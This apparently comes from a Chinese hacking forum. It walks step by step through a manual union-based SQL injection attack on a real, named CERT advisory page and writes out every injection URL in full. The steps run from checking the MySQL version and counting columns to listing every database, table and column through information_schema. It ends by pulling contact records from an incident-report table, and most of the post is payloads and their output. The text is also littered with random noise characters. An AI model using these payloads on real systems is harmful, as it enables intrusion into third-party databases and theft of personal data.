1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询, U7 {8 O6 k: }% {0 U! i
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
* H# K" ?3 x. p" F& Y& R- H) |http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--/ w. Z1 \ ^- o6 g( Q& Y
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
# |, K& R" d( [- `- N8 t5 s6 B数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。* F. q1 x# R! P+ Y" D
4.判断有没有写权限
# D/ H5 ~: m2 b; c1 V! P2 rhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
7 d: z- ?% ?4 x! R+ q' u) y) r9 R没办法,手动猜表啦( r. P+ t% G# M8 n' w! M6 l
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
# E( c3 ?0 P9 G- r J但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下" J2 V, V& `1 @2 H
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
6 e# s5 R# T r& R成功查出所有数据库,国外的黑客就是不一般。数据库如下:' E4 S+ L8 k0 a. \& \
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb8 v& p5 ? |. T! U2 I. q; B
6.爆表,爆的是twcert库
/ Z% U, n4 H2 d3 J2 O4 Zhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
( e1 ^9 {( W/ l# n2 W$ _0 k爆出如下表# z& B7 W" }* z N& m3 h
downloadfile,irsys,newsdata,secrpt,secrpt_big58 h( G9 p' s( E1 M+ o2 J: ]; u3 U
7.爆列名,这次爆的是irsys表
1 m# j9 }; ]) G" Fhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--2 i% |4 ~7 I. t% h
爆出如下列
! N. K! ?9 D, K2 u# t+ @8 Iir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status7 J, }. O. r3 a. V& ]0 r
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
1 y# O% d. t% T6 C1 M" h" {http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
# _: {* x5 j) ^( i D返回是3,说明每个列里有3个地段
2 g9 R9 i& S" J8 P5 E9 H9.爆字段内容1 A3 H3 n4 x9 i
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--) K7 ?4 }7 E: M$ V" P- n
爆出name列的第一个字段的内容
3 |, D7 z( Z7 @2 v6 `# nhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
" s* i* s5 A* C爆出name列的第二个字段的内容 |